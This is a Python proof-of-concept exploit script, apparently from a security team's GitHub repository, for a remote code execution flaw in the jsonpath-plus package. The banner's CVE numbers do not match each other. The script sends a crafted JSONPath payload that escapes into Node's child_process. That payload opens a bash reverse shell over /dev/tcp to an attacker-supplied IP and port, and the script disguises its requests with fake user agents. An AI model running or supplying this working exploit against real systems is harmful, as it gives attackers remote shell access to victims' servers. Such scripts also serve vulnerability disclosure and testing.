README.md
Rendering markdown...
import requests
from faker import Faker
from urllib.parse import urlparse
import time
import sys
import rich_click as click
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
banner = r"""
..-+*******-
.=#+-------=@. .:==:.
.**-------=*+: .-=++.-+=:.
+*-------=#=+++++++++=:.. -+:==**=+-+:.
.%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=..
:%--**+-::::::::::::::::::::+*=: .::*=**=:.
..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:.
..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-.
.-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:..
..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=.
.=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%-
.*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%-
.+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%-
.+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%-
.=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#-
.=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#-
.-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*:
:+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*.
.-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+.
.::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-.
%+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%.
*+.......+*::::::::::::::::-****-:::::=*=:.++:*=
.%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#.
++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=.
:#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-..
.++....-#:::%. .-*+-..*=.+@= .=+..-#
.:+++#@#-:-#= ... .-++:-%@@= .:#
:+++**##@#+=. -%@@@%- .-=*#.
.=+::+::-@: #@@@@+. :+*=::=*-
.=+:-**+%%+=-:.. =*#*-..=*-:::::=*
:++---::--=*#+*+++++**+*+**-::::::+=
.+*=:::---+*:::::++++++*+=:::::-*=.
.:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team)
..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2025-1302
Analysis base : https://github.com/EQSTLab/CVE-2025-1302
=============================================================================================================
CVE-2024-8353 : JSONPath-plus Remote Code Execution
description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
=============================================================================================================
"""
class JSONPath_plus_Exploit:
def __init__(self, url: str, ip: str, port: int):
self.url = url
self.ip = ip
self.port = port
self.formId = None
def greeting() -> None:
print(banner)
def spinner(duration=10, interval=0.1) -> None:
spinner_chars = ['|', '/', '-', '\\']
end_time = time.time() + duration
while time.time() < end_time:
for char in spinner_chars:
sys.stdout.write(f'\r[{char}] Exploit loading, please wait...')
sys.stdout.flush()
time.sleep(interval)
print("")
def sendRequest(self) -> None:
# Fake User_Agent
fake = Faker()
url = f"{self.url}"
pylode = f"$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('bash -c \\\"bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1\\\"').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
headers = {
'User-Agent': fake.user_agent(),
'Content-Type': 'application/json',
'Accept': '*/*'
}
try:
response = requests.post(url, json={'path' : pylode}, headers=headers, timeout=10)
print(f"[+] Exploit Completion!!")
except requests.exceptions.Timeout:
print(f"[+] Exploit Completion!!")
def exploit(self) -> None:
self.sendRequest()
# argument parsing with rich_click
@click.command()
@click.option(
"-u", "--url",
required=True,
help="Specify a URL or domain for vulnerability detection (Donation-Form Page)",
)
@click.option(
"-i", "--ip",
required=True,
help="LHOST for reverse shell connection",
)
@click.option(
"-p", "--port",
required=True, type=int,
help="LPORT for reverse shell connection"
)
def main(url: str, ip: str, port: int) -> None:
cve_exploit = JSONPath_plus_Exploit(url, ip, port)
JSONPath_plus_Exploit.greeting()
JSONPath_plus_Exploit.spinner(duration=1)
cve_exploit.exploit()
if __name__ == "__main__":
main()